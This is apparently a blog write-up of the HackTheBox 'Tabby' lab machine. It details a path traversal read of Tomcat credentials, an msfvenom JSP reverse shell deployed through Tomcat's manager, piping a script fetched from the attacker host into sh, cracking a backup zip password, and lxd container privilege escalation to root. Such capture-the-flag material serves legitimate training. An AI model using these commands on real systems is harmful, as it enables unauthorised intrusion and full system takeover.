HackTheBox - Tabby
Morten Hansen • January 30, 2022
Tabby
IP 10.10.10.194
NMAP
└─$ nmap -sC -sV 10.10.10.194 | tee NMAP/nmap.log
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HOST
gobuster vhost -u 10.10.10.194 -w /usr/share/wordlists/dirb/big.txt -t 100
nslookup
server 10.10.10.194
````
Gives nothing regardings possible host-domains.
**Browser**
`10.10.10.194` in th browser gives us a webpage with *Mega-hosting*.
<img src="/assets/img/megahosting.png">
The webpage gives us an email-address: `sales@megahosting.com`
Most of the links at the webpage seems to go to # but the NEWS tab, leads to a php-script called `http://megahosting.htb/news.php?file=statement`. This also shows that `megahosting.htb` is a host-name and should be added to `/etc/hosts` by inserting `10.10.10.194 megahosting.htb`.
This takes us to a webpage with some apology-message for a breach.
The link for the page is `http://megahosting.htb/news.php?file=statement` and the file is fetched with a php-query.
`10.10.10.194:8000` gives us another webpage with some basic information about tomcat.
<img src="/assets/img/tomcat.png">
It points out theese paths:
* The default Tomcat home page is found at `/var/lib/tomcat9/webapps/ROOT/index.html`
* the system instance of Tomcat is installed with CATALINA_HOME in `/usr/share/tomcat9` and CATALINA_BASE in `/var/lib/tomcat9`, following the rules from `/usr/share/doc/tomcat9-common/RUNNING.txt.gz`.
* Users are defined in `/etc/tomcat9/tomcat-users.xml`
**BURPSUITE**
We connect the magehosting.htb/news.php site to burpsuite and intercept the request. We send the request to repeater and change the filename to something we know is on the server. We also try to traverse back in the filestructur to come to the root path. The request then looks something like.
```bash
GET /news.php?file=../../../../../etc/passwd HTTP/1.1
This lists the file and we can read
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
....
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash
By trying different paths, we try to find the tomcat-user.xml file specified at the 10.10.10.194:8000 website. By trial and failure we can see that /usr/share/tomcat9 is the base path. I found the file at /news.php?file=../../../../../usr/share/tomcat9/etc/tomcat-users.xml.
It contained a username and password for Tomcat.
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
This works when accessing http://10.10.10.194/host-manager/html and we get sent to the tomcat manager page.
Create a WAR-file to deplay to tomcat:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.4 LPORT=4444 -f war > shell.war
Upload it to tomcat.
curl --upload-file /home/kali/Documents/machines/tabby/shell.war -u 'tomcat:$3cureP4s5w0rd123!' "http://10.10.10.194:8080/manager/text/deploy?path=/shell"
````
Then set up a listener in the terminal with `nc -lvnp 4444`and go to `http://10.10.10.194:8080/shell`in order to connect the reverse shell. We got connected as user `tomcat`.
I serve `linpea.sh` from my terminal with `python3 -m http.server 80` and run it in the `/tmp`folder on the victim machine, with `curl 10.10.16.4/linpeas.sh | sh | tee text.log` and save the output with `tee`. It does not giv us much so we have to enumerate ourselfs.
Search files with .conf, .db, .sqlite with `find / -iname ".*db.*"`
Did not find anything. Went back to tomcat-folder at `/var/www/html/files` and found a compressed backup-file called `16162020_backup.zip`. I then used the `megahosting.htb/news.php` exploit to download the zip-file.
I then extractet the hash with zip2john and editet the hash according to example hashes for hashcat.
```bash
hashcat -a 0 -m 17225 hash /usr/share/wordlists/rockyou.txt
#Result
$pkzip2$3*2*1*0*0*24*02f9*5d46*ccf7b799809a3d3c12abb83063af3c6dd538521379c8d744cd195945926884341a9c4f74*1*0*8*24*285c*5935*f422c178c96c8537b1297ae19ab6b91f497252d0a4efe86b3264ee48b099ed6dd54811ff*2*0*72*7b*5c67f19e*1b1f*4f*8*72*5c67*5a7a*ca5fafc4738500a9b5a41c17d7ee193634e3f8e483b6795e898581d0fe5198d16fe5332ea7d4a299e95ebfff6b9f955427563773b68eaee312d2bb841eecd6b9cc70a7597226c7a8724b0fcd43e4d0183f0ad47c14bf0268c1113ff57e11fc2e74d72a8d30f3590adc3393dddac6dcb11bfd*$/pkzip2$:admin@it
#password: admin@it
Then go in the reverse shell and change user with su ash and password admin@it. I then printed out my public key and placed it in a file at /home/ash/.ssh/authorized_keyswhich I also chmod 600 authorized_keys to give it the right permissions.
Then ssh ash@10.10.10.194 and we get a ssh-shell as ash.
I then ran linpeas.sh again and got an alert that ash was in the user group lxd. After a quick search I found this link https://www.hackingarticles.in/lxd-privilege-escalation/.
#download to attack computer
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
#creates a .tar.gz file that we upload to the victim machine with python -m http.server again.
#at victim computer after uploaded the .tar.gz-file:
lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
lxd init #complete the set up
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
#move to /mnt/root to see resources at the machine
#move into root/.ssh and configure the authorized_keys file to include our own public-key. I used `vi`to edit the file.
#at attacking machine
ssh root@10.10.10.194
This gives us a root-shell that we can connect to using SSH.
